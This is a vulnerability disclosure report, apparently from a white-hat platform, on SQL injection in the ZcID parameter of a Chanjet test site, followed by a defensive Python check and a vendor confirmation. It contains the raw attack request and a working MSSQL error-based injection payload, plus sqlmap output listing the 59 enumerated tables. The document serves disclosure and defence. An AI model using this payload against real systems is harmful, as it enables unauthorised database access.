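2015-10-06: Details reported to the vendor; awaiting vendor handling
2015-10-08: Vendor confirmed; details disclosed only to the vendor
2015-10-18: Details disclosed to core white hats and experts in related fields
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public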
POST /Card_2.aspx HTTP/1.1
Content-Length: 301
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://treistertest.chanjet.com
Cookie: ASP.NET_SessionId=405q5pz23k3tg0451cqkugbr
Host: treistertest.chanjet.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ZcID=OA&__EVENTVALIDATION=/wEWAgLMkJisBwLj7c7hARq0%2b9wFfKIupqhlfeZ6GaGeVsmI&__VIEWSTATE=/wEPDwUKMTYyODY2MzAzNw9kFgICAw9kFgQCAQ8WAh4HVmlzaWJsZWhkAgMPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZBY/t3B6ofgzuPmIM2QSdG2IwzEE
The ZcID parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ZcID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ZcID=OA' AND 6965=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6965=6965) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'tooO'='tooO&__EVENTVALIDATION=/wEWAgLMkJisBwLj7c7hARq0+9wFfKIupqhlfeZ6GaGeVsmI&__VIEWSTATE=/wEPDwUKMTYyODY2MzAzNw9kFgICAw9kFgQCAQ8WAh4HVmlzaWJsZWhkAgMPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZBY/t3B6ofgzuPmIM2QSdG2IwzEE
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: distribution
[59 tables]
+------------------------------------+
| IHarticles                         |
| IHcolumns                          |
| IHconstrainttypes                  |
| IHextendedArticleView              |
| IHextendedSubscriptionView         |
| IHindextypes                       |
| IHpublications                     |
| IHpublishercolumnconstraints       |
| IHpublishercolumnindexes           |
| IHpublishercolumns                 |
| IHpublisherconstraints             |
| IHpublisherindexes                 |
| IHpublishers                       |
| IHpublishertables                  |
| IHsubscriptions                    |
| IHsyscolumns                       |
| MSarticles                         |
| MScached_peer_lsns                 |
| MSdistribution_agents              |
| MSdistribution_history             |
| MSdistribution_status              |
| MSlogreader_agents                 |
| MSlogreader_history                |
| MSmerge_agents                     |
| MSmerge_articlehistory             |
| MSmerge_articleresolver            |
| MSmerge_history                    |
| MSmerge_identity_range_allocations |
| MSmerge_sessions                   |
| MSmerge_subscriptions              |
| MSpublication_access               |
| MSpublications                     |
| MSpublicationthresholds            |
| MSpublisher_databases              |
| MSqreader_agents                   |
| MSqreader_history                  |
| MSrepl_backup_lsns                 |
| MSrepl_commands                    |
| MSrepl_errors                      |
| MSrepl_identity_range              |
| MSrepl_originators                 |
| MSrepl_transactions                |
| MSrepl_version                     |
| MSreplication_monitordata          |
| MSsnapshot_agents                  |
| MSsnapshot_history                 |
| MSsubscriber_info                  |
| MSsubscriber_schedule              |
| MSsubscriptions                    |
| MSsync_states                      |
| MStracer_history                   |
| MStracer_tokens                    |
| UIProperties                       |
| sysarticlecolumns                  |
| sysarticles                        |
| sysextendedarticlesview            |
| syspublications                    |
| sysschemaarticles                  |
| syssubscriptions                   |
+------------------------------------+
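An added example, not part of the original report: a request-body check that rejects a malformed ZcID and labels the MSSQL error-based markers visible in the sqlmap payload above, for logging or WAF tuning. The allow-list format for ZcID, the function name `inspect_body` and the sample bodies are assumptions; the report only shows the value `OA`.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: ZcID is a short alphanumeric code (the report only shows "OA").
ZCID_ALLOWED = re.compile(r"[A-Za-z0-9]{1,16}")

# Markers of the MSSQL error-based technique visible in the reported payload.
SIGNATURES = {
    "convert_int_subquery": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I),
    "char_concat_chain": re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*\+\s*){3,}", re.I),
    "quote_breakout": re.compile(r"'\s*(?:AND|OR)\b", re.I),
}

def inspect_body(body, param="ZcID"):
    """Decode a urlencoded POST body and assess one parameter.

    Returns {"valid": bool, "signatures": [names]}; a missing or repeated
    parameter is treated as invalid.
    """
    values = parse_qs(body, keep_blank_values=True).get(param, [])
    valid = len(values) == 1 and ZCID_ALLOWED.fullmatch(values[0]) is not None
    hits = sorted(name for name, rx in SIGNATURES.items()
                  if any(rx.search(v) for v in values))
    return {"valid": valid, "signatures": hits}

# Constructed samples: the benign value from the request in the report, and a
# shortened form of the payload shown in the sqlmap output.
BENIGN_BODY = urlencode({"ZcID": "OA", "__VIEWSTATE": "placeholder"})
FLAGGED_BODY = urlencode({"ZcID": "OA' AND 6965=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)"
                                  "+CHAR(113)+CHAR(113))) AND 'tooO'='tooO"})

if __name__ == "__main__":
    for body in (BENIGN_BODY, FLAGGED_BODY):
        print(inspect_body(body))
```

The allow-list is what rejects the request; the signatures only label it for triage. Neither replaces binding ZcID as a query parameter in the page handler.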
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-08 14:55
Thank you for your attention and support. The issue exists and we are fixing it.
None yet